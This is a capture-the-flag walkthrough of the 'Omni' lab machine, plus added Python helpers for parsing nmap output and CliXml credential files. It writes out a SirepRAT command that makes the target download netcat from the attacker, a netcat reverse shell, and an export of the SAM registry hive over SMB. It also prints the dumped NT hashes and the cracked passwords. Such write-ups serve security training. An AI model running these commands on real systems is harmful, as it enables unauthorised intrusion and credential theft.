# Omni

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F3Y78cZMUW7UnWa9LkHoW%2Fomni.png?alt=media\&token=44ac3d2a-56c7-4497-a3f2-9462ff6a8760)

## Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command scans the target machine for open ports quickly and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.204 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, the fastest of nmap's timing templates.
* `-Pn` skip host discovery and assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

```
# Nmap 7.92 scan initiated Thu Jun 16 14:08:04 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.044s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown

# Nmap done at Thu Jun 16 14:08:30 2022 -- 1 IP address (1 host up) scanned in 26.61 seconds
```
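The usual next step is to feed the open ports from this first scan into the targeted scan. The following script, an added example that is not part of the original writeup, parses nmap's normal (`-oN`) output and builds that second command line. The scan text is embedded as a constructed sample copied from the output above; ports whose state is `filtered` or `open|filtered` are deliberately left out so the follow-up scan stays focused.

```python
import re

# Constructed sample: the allPorts output shown above, embedded so the
# script runs offline without a target.
ALLPORTS_OUTPUT = """\
# Nmap 7.92 scan initiated Thu Jun 16 14:08:04 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.044s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown

# Nmap done at Thu Jun 16 14:08:30 2022 -- 1 IP address (1 host up) scanned in 26.61 seconds
"""

# One port line of nmap's normal (-oN) output: "<port>/<proto> <state> <service>"
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(text, proto="tcp"):
    """Return the sorted list of port numbers whose state is exactly 'open'.

    'open|filtered' and 'filtered' lines are skipped: they would only add
    noise (and time) to the version-detection scan.
    """
    ports = set()
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(2) == proto and m.group(3) == "open":
            ports.add(int(m.group(1)))
    return sorted(ports)


def targeted_scan_command(text, target, outfile="targeted"):
    """Build the second-stage nmap command line (-sC -sV on the open ports)."""
    ports = parse_open_ports(text)
    if not ports:
        raise ValueError("no open TCP ports found in scan output")
    port_arg = ",".join(str(p) for p in ports)
    return f"nmap -sC -sV -p{port_arg} {target} -oN {outfile}"


if __name__ == "__main__":
    print(parse_open_ports(ALLPORTS_OUTPUT))
    print(targeted_scan_command(ALLPORTS_OUTPUT, "10.10.10.204"))
```

Pointing `parse_open_ports` at a real `allPorts` file is just `parse_open_ports(open("allPorts").read())`.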

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p135,5985,8080,29817,29819,29820 10.10.10.204 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Thu Jun 16 14:09:33 2022 as: nmap -sCV -p135,5985,8080,29817,29819,29820 -oN targeted 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.038s latency).

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
|_http-title: Site doesn't have a title.
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.92%I=7%D=6/16%Time=62AB1D85%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 16 14:10:48 2022 -- 1 IP address (1 host up) scanned in 75.72 seconds
```

If we take a look at the website on port *8080*, it will ask for some credentials that we don't have.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FPq8TmHo9LBvb0miv3wC8%2Fimage.png?alt=media\&token=d2f09f57-96ef-431d-a993-8734b00eb49c)

Let's enumerate the website with the *whatweb* tool.

> whatweb <http://10.10.10.204:8080>

```
http://10.10.10.204:8080 [401 Unauthorized] Cookies[CSRF-Token], Country[RESERVED][ZZ], HTTPServer[Microsoft-HTTPAPI/2.0], IP[10.10.10.204], Microsoft-HTTPAPI[2.0], WWW-Authenticate[Windows Device Portal][Basic]
```

## Exploitation

If we take a look at the result, we'll see the `Windows Device Portal` feature. At this point, I started looking for common exploits associated with that feature, and I found [this](https://github.com/SafeBreach-Labs/SirepRAT) exploit on GitHub. Download it and install it with the following commands.

> git clone <https://github.com/SafeBreach-Labs/SirepRAT>
>
> cd SirepRAT/
>
> pip3 install -r requirements.txt
>
> python3 setup.py install

This tool allows us, among other things, to execute commands on the victim machine. To get a reverse shell, we'll have to transfer the `nc64.exe` binary to the *Omni* machine. First, let's start a simple HTTP server with Python in the directory where `nc64.exe` is located.

> python -m http.server 80

Then, execute the SirepRAT tool, so that it will download the `nc64.exe` binary, and save it in the *AppLocker* bypass directory `C:\Windows\System32\spool\drivers\color\`.

> python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "powershell" --args "/c iwr -uri http://10.10.14.9/nc64.exe -outfile C:\Windows\System32\spool\drivers\color\nc64.exe"

* `--return_output` have the target device return the command's **output** stream.
* `--cmd` **program** to execute.
* `--args` **arguments** string for the program.

Once we have transferred the `nc64.exe` binary to the victim machine, let's set a *netcat* listener on port *4444* with *rlwrap*.

> rlwrap nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Now, we'll have to execute the `nc64.exe` binary so that it sends us a reverse shell.

> python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c c:\windows\system32\spool\drivers\color\nc64.exe -e cmd 10.10.14.9 4444'

```
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49671
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>
```

## Privilege Escalation

We'll see that the `whoami` command doesn't work, but we can still find out which user we are by printing the value of the `%username%` variable.

> echo %username%

```
omni$
```

We can also list the users on the system.

> net user

```
User accounts for \\

-------------------------------------------------------------------------------
Administrator            app                      DefaultAccount           
DevToolsUser             Guest                    sshd                     
WDAGUtilityAccount       
The command completed with one or more errors.
```

Now, let's go to the root directory and find the *user* and *root* flags recursively.

> dir /s user.txt root.txt

* `/s` search the current directory and all its subdirectories.

```
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\Data\Users\administrator

07/04/2020  09:48 PM             1,958 root.txt
               1 File(s)          1,958 bytes

 Directory of C:\Data\Users\app

07/04/2020  09:53 PM             1,958 user.txt
               1 File(s)          1,958 bytes

     Total Files Listed:
               2 File(s)          3,916 bytes
               0 Dir(s)     584,065,024 bytes free
```

If we try to view the flags, we'll see that they have an unusual format.

> type C:\Data\Users\administrator\root.txt C:\Data\Users\app\user.txt

```
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">...</SS>
    </Props>
  </Obj>
</Objs>
C:\Data\Users\app\user.txt

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">...</SS>
    </Props>
  </Obj>
</Objs>
```
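Both files are PowerShell CliXml exports of a `PSCredential` object, which is what `Export-Clixml` produces. The following script, added here as an example and not part of the original writeup, parses such a file without PowerShell, pulls out the user name and classifies the `Password` element: a `SecureString` serialized this way (no `-Key`) is a hex-encoded DPAPI blob, recognisable by the DPAPI version word and provider GUID at its start, and can only be decrypted by the user who exported it, on the same machine. The blob in the embedded sample is constructed (a real DPAPI header followed by filler bytes), since the real values are not reproduced here.

```python
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
NS = {"ps": PS_NS}

# A SecureString serialized by ConvertFrom-SecureString / Export-Clixml without
# -Key is a hex DPAPI blob: version 1 followed by the DPAPI provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb (stored in GUID byte order).
DPAPI_BLOB_PREFIX = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample blob: the genuine DPAPI header plus 32 filler bytes.
SAMPLE_BLOB_HEX = DPAPI_BLOB_PREFIX.hex() + "00" * 32

# Constructed sample file with the same layout as user.txt / root.txt above.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">%s</SS>
    </Props>
  </Obj>
</Objs>
""" % SAMPLE_BLOB_HEX


def classify_secure_string(value):
    """Tell how a serialized SecureString is protected."""
    try:
        blob = bytes.fromhex(value.strip())
    except ValueError:
        return "not-hex"
    if blob.startswith(DPAPI_BLOB_PREFIX):
        # Decryptable only by the exporting user on the exporting host:
        # another account (even SYSTEM) gets a CryptographicException.
        return "dpapi-user-bound"
    return "other"  # e.g. exported with an explicit -Key (AES, portable)


def inspect_credential_export(xml_text):
    """Parse an Export-Clixml PSCredential file and report what it holds."""
    root = ET.fromstring(xml_text)
    obj = root.find("ps:Obj", NS)
    if obj is None:
        raise ValueError("no serialized object found")
    type_names = [t.text for t in obj.findall("ps:TN/ps:T", NS)]
    if "System.Management.Automation.PSCredential" not in type_names:
        raise ValueError("object is not a PSCredential: %s" % type_names)
    props = {}
    for prop in obj.find("ps:Props", NS):
        local_tag = prop.tag.split("}", 1)[1]  # "S" (string) or "SS" (SecureString)
        props[prop.get("N")] = (local_tag, prop.text or "")
    _, username = props.get("UserName", ("S", ""))
    pw_tag, password = props.get("Password", ("SS", ""))
    protection = classify_secure_string(password) if pw_tag == "SS" else "plaintext"
    blob_length = len(password.strip()) // 2 if protection != "not-hex" else 0
    return {"username": username, "password_protection": protection,
            "blob_length": blob_length}


if __name__ == "__main__":
    print(inspect_credential_export(SAMPLE_CLIXML))
```

Run against a real export with `inspect_credential_export(open("user.txt").read())`; a `dpapi-user-bound` result tells you in advance that `Import-CliXml` will only succeed when run as the account that created the file.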

In order to view the real flags, we'll have to use *PowerShell* and execute the following command.

> powershell
>
> (Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential().password

```
Import-CliXml : Error occurred during a cryptographic operation.
At line:1 char:2
+ (Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential ...
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Import-Clixml], Cryptographic 
   Exception
    + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept 
   ion,Microsoft.PowerShell.Commands.ImportClixmlCommand
```

But we get an error. Maybe it is because we don't have the right permissions: the `Password` value in a CliXml export is a `SecureString` encrypted with DPAPI under the exporting user's key, so only that same user, on the same machine, can decrypt it. We'll see that we have `SYSTEM` privileges, and because of that, we can make a copy of the `SAM` and `SYSTEM` registry hives. First, let's create a new folder called `temp` in the root folder, and then save a copy of those hives there.

> mkdir C:\temp
>
> cd C:\temp
>
> reg save HKLM\sam sam.backup
>
> reg save HKLM\system system.backup

Now, let's transfer those to our local machine. First, let's set an *SMB* server with *impacket*.

> impacket-smbserver smbFolder $(pwd) -smb2support

Then, copy the files to the *SMB* share.

> copy sam.backup \\10.10.14.9\smbFolder
>
> copy system.backup \\10.10.14.9\smbFolder

Once we have those files on our local machine, we can extract the users' hashes with *secretsdump*.

> impacket-secretsdump -system system.backup -sam sam.backup LOCAL

* `-system` **SYSTEM** hive to parse.
* `-sam` **SAM** hive to parse.

```
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Cleaning up...
```

Now, let's put those hashes in a file called `hashes` and try to crack them with *john*.

> john --wordlist=/usr/share/wordlists/rockyou.txt hashes --format=NT

```
Using default input encoding: UTF-8
Loaded 6 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Guest)     
mesh5143         (app)     
2g 0:00:00:03 DONE (2022-06-17 00:17) 0.5181g/s 3715Kp/s 3715Kc/s 16317KC/s  _ 09..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
```

And we get the `mesh5143` password. We can try to log in on the website with the user `app` and that password.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FmFC24KEf9Yf1zx06mlA1%2Fimage.png?alt=media\&token=4b0fb6c3-a6fa-4b2a-9829-841b088a1344)

And we get in.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FKv4NkTdfc0nENzqtjEvY%2Fimage.png?alt=media\&token=ecda45c8-fcfc-48ee-b585-7cf78915fb2b)

We'll see that we can run commands as the `app` user, from the `Processes` section.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FfsZeNmNWr6JUqbM8kdhL%2Fimage.png?alt=media\&token=ccdbb9bc-1901-4936-bfab-279a345bef6b)

Now, let's set another *netcat* listener on port 4444 with *rlwrap*.

> rlwrap nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

And now, send a reverse shell again, but this time as the `app` user.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FOne27EGNBOiBOmfi0LPQ%2Fimage.png?alt=media\&token=cc29446b-95f0-4c55-9af1-608d9863bd5a)

```
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49674
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>
```

At this point, we could see the user flag with the same method as before.

> powershell
>
> (Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential().password

```
7cfd50f6bc34db3204898f1505ad9d70
```

But now we can't see the *root* flag. However, there is a file with the same format as the flags in the `app` home folder, called `iot-admin.xml`. If we view its contents, we'll see another password.

> powershell
>
> (Import-CliXml -Path C:\data\users\app\iot-admin.xml).GetNetworkCredential().password

```
_1nt3rn37ofTh1nGz
```

Now, let's try to log in on the website again, but this time as the `administrator` user. You'll need to close and reopen your browser.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F2UsNxg3XoHWHa9mZOibB%2Fimage.png?alt=media\&token=2fbbfbcc-73e2-4edc-80d9-92b84f518df5)

And we get in again, but as the `administrator` user.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F9uwvYH6NhzylCVl03jpy%2Fimage.png?alt=media\&token=1293b0b0-00e9-4354-9345-18c1d6e3eb1a)

Now, let's send another reverse shell, but as the `administrator` user.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FOne27EGNBOiBOmfi0LPQ%2Fimage.png?alt=media\&token=cc29446b-95f0-4c55-9af1-608d9863bd5a)

```
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49674
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>
```

Finally, as we are the `administrator` user, all we have to do is reap the harvest and take the root flag with the same method as before.

> (Import-CliXml -Path C:\data\users\administrator\root.txt).GetNetworkCredential().password

```
5dbdce5569e2c4708617c0ce6e9bf11d
```
